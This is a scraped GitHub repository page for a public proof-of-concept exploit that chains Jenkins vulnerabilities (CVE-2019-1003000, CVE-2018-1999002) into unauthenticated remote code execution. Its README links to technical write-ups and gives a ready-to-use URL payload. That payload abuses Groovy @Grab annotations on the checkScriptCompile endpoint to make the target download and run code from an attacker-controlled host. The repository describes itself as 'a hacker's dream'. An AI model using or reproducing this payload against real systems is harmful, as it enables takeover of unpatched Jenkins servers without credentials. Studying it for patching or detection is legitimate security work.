Skip to content
/ Jenkins-PreAuth-RCE-PoC Public
forked from petercunha/jenkins-rce

Jenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)

0 stars 66 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

r0hack/Jenkins-PreAuth-RCE-PoC

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
code
code
 
 
www/package/payload/1
www/package/payload/1
 
 
README.txt
README.txt
 
 
build.sh
build.sh
 
 

Repository files navigation

JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION
---------------------------------------------

CODEBY.NET - https://codeby.net/threads/rce-v-jenkins.66855/

Технические подробности - 
Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html


URL Payload:
------------
http://<TARGET HOST>/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a
@Grab(group='package', module='payload', version='1')%0a
import Payload;

About

Jenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Java 68.8%
  • Shell 31.2%